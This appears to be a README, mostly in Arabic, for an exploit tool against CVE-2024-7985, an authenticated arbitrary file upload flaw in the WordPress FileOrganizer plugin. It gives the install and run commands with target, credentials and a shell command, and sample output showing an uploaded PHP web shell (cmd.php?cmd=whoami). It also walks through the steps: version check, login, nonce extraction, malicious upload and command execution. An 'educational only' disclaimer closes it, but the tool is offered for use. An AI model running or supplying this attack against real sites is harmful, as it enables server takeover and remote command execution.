
FileOrganizer <= 1.0.9 - رفع ملف تعسفي مع مصادقة (مشترك+)
FileOrganizer <= 1.0.9 - رفع ملفات تعسفي للمستخدمين المصادق عليهم (Subscriber+)
CVE-2024-7985 - إضافة ووردبريس FileOrganizer <= 1.0.9 معرّضة لثغرة رفع ملفات تعسفي للمستخدمين المصادق عليهم، مما يسمح للمهاجمين بصلاحيات Subscriber+ برفع وتنفيذ ملفات خبيثة عن بُعد. تنشأ هذه الثغرة بسبب غياب التحقق من نوع الملف في دالة fileorganizer_ajax_handler، مما يجعل تنفيذ الأوامر عن بُعد (RCE) ممكنًا.
🚨 يسمح هذا الاستغلال للمهاجمين بتنفيذ أوامر تعسفية على الخادم! 🚨
requestsbeautifulsoup4تثبيت التبعيات:
pip install requests beautifulsoup4
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]
FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi
options:
-h, --help show this help message and exit
--url URL Target WordPress site URL
--username USERNAME WordPress Username
--password PASSWORD WordPress Password
--cmd CMD Command to execute in uploaded file
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami
1️⃣ فحص الإصدار - يحدد ما إذا كان الموقع معرّضًا للثغرة.
2️⃣ المصادقة - تسجيل الدخول إلى ووردبريس.
3️⃣ استخراج Nonce - استرجاع رمز الأمان.
4️⃣ رفع الملف - رفع سكربت PHP خبيث.
5️⃣ تنفيذ الأوامر - تنفيذ الأوامر التي يحددها المستخدم.
هذا السكربت لأغراض تعليمية فقط؛ لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو عواقب. 🚨